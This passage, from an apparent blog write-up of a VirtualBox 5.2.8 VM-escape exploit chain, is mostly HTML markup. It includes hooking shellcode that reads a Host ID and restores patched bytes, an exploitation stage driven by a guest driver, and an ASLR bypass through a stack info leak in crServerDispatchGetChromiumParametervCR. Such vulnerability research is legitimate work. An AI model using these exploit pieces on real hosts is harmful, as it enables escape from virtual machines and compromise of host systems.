data-line=\"crayon-5b7b3e582f540970066329-36\">36<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f540970066329-37\">37<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f540970066329-38\">38<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f540970066329-39\">39<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f540970066329-40\">40<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f540970066329-41\">41<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f540970066329-42\">42<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f540970066329-43\">43<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f540970066329-44\">44<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f540970066329-45\">45<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f540970066329-46\">46<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f540970066329-47\">47<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f540970066329-48\">48<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f540970066329-49\">49<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f540970066329-50\">50<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f540970066329-51\">51<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f540970066329-52\">52<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f540970066329-53\">53<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f540970066329-54\">54<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f540970066329-55\">55<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f540970066329-56\">56<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f540970066329-57\">57<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f540970066329-58\">58<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f540970066329-59\">59<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f540970066329-60\">60<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f540970066329-61\">61<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f540970066329-62\">62<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f540970066329-63\">63<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f540970066329-1\"><span class=\"crayon-m\">PUBLIC<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Shellcode<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f540970066329-2\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f540970066329-3\"><span class=\"crayon-e\">EXTERN <\/span><span class=\"crayon-v\">gHostId<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">DWORD<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f540970066329-4\"><span class=\"crayon-e\">EXTERN <\/span><span class=\"crayon-v\">RestoreBytes<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">PROC<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f540970066329-5\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f540970066329-6\"><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">CODE<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f540970066329-7\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f540970066329-8\"><span class=\"crayon-e\">Shellcode <\/span><span class=\"crayon-i\">PROC<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f540970066329-9\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f540970066329-10\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">We <\/span><span class=\"crayon-e\">should <\/span><span class=\"crayon-e\">preserve <\/span><span class=\"crayon-e\">all <\/span><span class=\"crayon-e\">the <\/span><span class=\"crayon-e\">registers <\/span><span class=\"crayon-e\">because <\/span><span class=\"crayon-i\">it<\/span><span class=\"crayon-s\">&#8216;s not known<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f540970066329-11\"><span class=\"crayon-s\">\t; what of them will be used in RestoreBytes()<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f540970066329-12\"><span class=\"crayon-s\">\tpush rax<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f540970066329-13\"><span class=\"crayon-s\">\tpush rbx<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f540970066329-14\"><span class=\"crayon-s\">\tpush rcx<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f540970066329-15\"><span class=\"crayon-s\">\tpush rdx<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f540970066329-16\"><span class=\"crayon-s\">\tpush rsi<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f540970066329-17\"><span class=\"crayon-s\">\tpush rdi<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f540970066329-18\"><span class=\"crayon-s\">\tpush r8<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f540970066329-19\"><span class=\"crayon-s\">\tpush r9<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f540970066329-20\"><span class=\"crayon-s\">\tpush r10<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f540970066329-21\"><span class=\"crayon-s\">\tpush r11<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f540970066329-22\"><span class=\"crayon-s\">\tpush r12<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f540970066329-23\"><span class=\"crayon-s\">\tpush r13<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f540970066329-24\"><span class=\"crayon-s\">\tpush r14<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f540970066329-25\"><span class=\"crayon-s\">\tpush r15<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f540970066329-26\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f540970066329-27\"><span class=\"crayon-s\">\t; IDirect3DSurface9* pSrcSurfIf = [rsp + 0260h]<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f540970066329-28\"><span class=\"crayon-s\">\t; We add 8 to because the shellcode is call&#8217;<\/span><span class=\"crayon-e\">ed <\/span><span class=\"crayon-e\">by <\/span><span class=\"crayon-e\">the <\/span><span class=\"crayon-i\">patch<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f540970066329-29\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">We <\/span><span class=\"crayon-e\">also <\/span><span class=\"crayon-i\">add<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">112<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">to<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">account <\/span><span class=\"crayon-e\">all <\/span><span class=\"crayon-e\">the <\/span><span class=\"crayon-i\">push<\/span>&#8216;<span class=\"crayon-e\">es<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">8<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">14<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f540970066329-30\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">mov <\/span><span class=\"crayon-v\">rax<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">qword <\/span><span class=\"crayon-i\">ptr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">rsp<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0260h<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">08h<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">070h<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f540970066329-31\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f540970066329-32\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">wined3d_surface*<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">surface<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">d3d9_surface*<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-v\">pSrcSurfIf<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-e\">wined3d_surface<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f540970066329-33\"><span class=\"crayon-e\">\t<\/span><span class=\"crayon-e\">mov <\/span><span class=\"crayon-v\">rax<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">qword <\/span><span class=\"crayon-i\">ptr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">rax<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">010h<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f540970066329-34\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f540970066329-35\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">uint32_t <\/span><span class=\"crayon-v\">hostId<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">surface<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-e\">texture_name<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f540970066329-36\"><span class=\"crayon-e\">\t<\/span><span class=\"crayon-e\">mov <\/span><span class=\"crayon-v\">eax<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">dword <\/span><span class=\"crayon-i\">ptr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">rax<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0F4h<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f540970066329-37\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f540970066329-38\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Save <\/span><span class=\"crayon-e\">Host <\/span><span class=\"crayon-e\">ID<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f540970066329-39\"><span class=\"crayon-e\">\t<\/span><span class=\"crayon-e\">mov <\/span><span class=\"crayon-e\">dword <\/span><span class=\"crayon-i\">ptr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">gHostId<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">eax<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f540970066329-40\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f540970066329-41\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Replace <\/span><span class=\"crayon-e\">the <\/span><span class=\"crayon-e\">patch <\/span><span class=\"crayon-e\">with <\/span><span class=\"crayon-e\">original <\/span><span class=\"crayon-e\">bytes <\/span><span class=\"crayon-e\">so <\/span><span class=\"crayon-e\">the <\/span><span class=\"crayon-e\">shellcode <\/span><span class=\"crayon-e\">will <\/span><span class=\"crayon-st\">not<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">be <\/span><span class=\"crayon-e\">called <\/span><span class=\"crayon-e\">anymore<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f540970066329-42\"><span class=\"crayon-e\">\t<\/span><span class=\"crayon-e\">call <\/span><span class=\"crayon-e\">RestoreBytes<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f540970066329-43\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f540970066329-44\"><span class=\"crayon-e\">\t<\/span><span class=\"crayon-e\">pop <\/span><span class=\"crayon-e\">r15<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f540970066329-45\"><span class=\"crayon-e\">\t<\/span><span class=\"crayon-e\">pop <\/span><span class=\"crayon-e\">r14<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f540970066329-46\"><span class=\"crayon-e\">\t<\/span><span class=\"crayon-e\">pop <\/span><span class=\"crayon-e\">r13<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f540970066329-47\"><span class=\"crayon-e\">\t<\/span><span class=\"crayon-e\">pop <\/span><span class=\"crayon-e\">r12<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f540970066329-48\"><span class=\"crayon-e\">\t<\/span><span class=\"crayon-e\">pop <\/span><span class=\"crayon-e\">r11<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f540970066329-49\"><span class=\"crayon-e\">\t<\/span><span class=\"crayon-e\">pop <\/span><span class=\"crayon-e\">r10<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f540970066329-50\"><span class=\"crayon-e\">\t<\/span><span class=\"crayon-e\">pop <\/span><span class=\"crayon-e\">r9<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f540970066329-51\"><span class=\"crayon-e\">\t<\/span><span class=\"crayon-e\">pop <\/span><span class=\"crayon-e\">r8<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f540970066329-52\"><span class=\"crayon-e\">\t<\/span><span class=\"crayon-e\">pop <\/span><span class=\"crayon-e\">rdi<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f540970066329-53\"><span class=\"crayon-e\">\t<\/span><span class=\"crayon-e\">pop <\/span><span class=\"crayon-e\">rsi<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f540970066329-54\"><span class=\"crayon-e\">\t<\/span><span class=\"crayon-e\">pop <\/span><span class=\"crayon-e\">rdx<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f540970066329-55\"><span class=\"crayon-e\">\t<\/span><span class=\"crayon-e\">pop <\/span><span class=\"crayon-e\">rcx<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f540970066329-56\"><span class=\"crayon-e\">\t<\/span><span class=\"crayon-e\">pop <\/span><span class=\"crayon-e\">rbx<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f540970066329-57\"><span class=\"crayon-e\">\t<\/span><span class=\"crayon-e\">pop <\/span><span class=\"crayon-e\">rax<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f540970066329-58\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f540970066329-59\"><span class=\"crayon-e\">\t<\/span><span class=\"crayon-e\">ret<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f540970066329-60\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f540970066329-61\"><span class=\"crayon-e\">Shellcode <\/span><span class=\"crayon-e\">ENDP<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f540970066329-62\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f540970066329-63\"><span class=\"crayon-st\">END<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0059 seconds] -->  <\/p>\n<p>The shellcode takes pSrcSurfIf, the value returned by VBoxD3DIfSurfGet, and goes through several structures to get Host ID. After that the shellcode restores an original bytes at the place of the jumper. This process of patching, hijacking, and restoring is repeated for 4 times. It&#8217;s because there are several Host ID and we must not accidentally take the lowest. For more details, see the HostIdHijacker.c file (not included in this blog post, for details on how to obtain it see the bottom of this post).<\/p>\n<p>After Host ID is gathered it&#8217;s returned to the launcher process via WriteProcessMemory.<\/p>\n<p><i>Stage 3: Exploitation<\/i><br \/> <b>Preparations<\/b><br \/> dwm.exe process is suspended using PsSuspend tool by Sysinternals.<br \/> The launcher sends IOCTL_EXPLOIT command to the driver. The driver initializes HGSMI interface to communicate with the host.<\/p>\n<p><b>ASLR Bypass<\/b><\/span><\/p>\n<p>To bypass ASLR we need an additional vulnerability, ideally an information leak. There is such vulnerability in a handler of CR_GETCHROMIUMPARAMETERVCR_EXTEND_OPCODE Chromium command. The handler allocates a buffer on the stack and then reads it with length specified in the command, without a boundaries check. This way we able to obtain addresses inside VBoxSharedCrOpenGL.so and VBoxDD.so.<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5b7b3e582f547537569397\" class=\"crayon-syntax crayon-theme-sublime-text crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> (\/VirtualBox-5.2.8\/src\/VBox\/HostServices\/SharedOpenGL\/crserverlib\/server_misc.c)  void SERVER_DISPATCH_APIENTRY crServerDispatchGetChromiumParametervCR(GLenum target, GLuint index, GLenum type, GLsizei count, GLvoid *values)  {      GLubyte local_storage[4096];      GLint bytes = 0;        switch (type) {      case GL_BYTE:      case GL_UNSIGNED_BYTE:           bytes = count * sizeof(GLbyte);           break;      case GL_SHORT:      case GL_UNSIGNED_SHORT:           bytes = count * sizeof(GLshort);           break;      case GL_INT:      case GL_UNSIGNED_INT:           bytes = count * sizeof(GLint);           break;      case GL_FLOAT:           bytes = count * sizeof(GLfloat);           break;      case GL_DOUBLE:           bytes = count * sizeof(GLdouble);           break;      default:           crError(&#8220;Bad type in crServerDispatchGetChromiumParametervCR&#8221;);      }    &#8230;        crServerReturnValue( local_storage, bytes );  }<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f547537569397-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f547537569397-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f547537569397-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f547537569397-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f547537569397-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f547537569397-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f547537569397-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f547537569397-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f547537569397-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f547537569397-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f547537569397-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f547537569397-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f547537569397-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f547537569397-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f547537569397-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f547537569397-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f547537569397-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f547537569397-18\">18<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f547537569397-19\">19<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f547537569397-20\">20<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f547537569397-21\">21<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f547537569397-22\">22<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f547537569397-23\">23<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f547537569397-24\">24<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f547537569397-25\">25<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f547537569397-26\">26<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f547537569397-27\">27<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f547537569397-28\">28<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f547537569397-29\">29<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f547537569397-30\">30<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f547537569397-31\">31<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f547537569397-32\">32<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f547537569397-33\">33<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f547537569397-1\"><span class=\"crayon-sy\">(<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">VirtualBox<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">5.2.8<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">src<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">VBox<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">HostServices<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">SharedOpenGL<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">crserverlib<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">server_misc<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">c<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f547537569397-2\"><span class=\"crayon-t\">void<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">SERVER_DISPATCH_APIENTRY <\/span><span class=\"crayon-e\">crServerDispatchGetChromiumParametervCR<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">GLenum <\/span><span class=\"crayon-v\">target<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">GLuint <\/span><span class=\"crayon-v\">index<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">GLenum <\/span><span class=\"crayon-v\">type<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">GLsizei <\/span><span class=\"crayon-v\">count<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">GLvoid *<\/span><span class=\"crayon-v\">values<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f547537569397-3\"><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f547537569397-4\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">GLubyte <\/span><span class=\"crayon-v\">local_storage<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">4096<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f547537569397-5\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">GLint <\/span><span class=\"crayon-v\">bytes<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f547537569397-6\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f547537569397-7\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">switch<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">type<\/span><span class=\"crayon-sy\">)<\/span><span 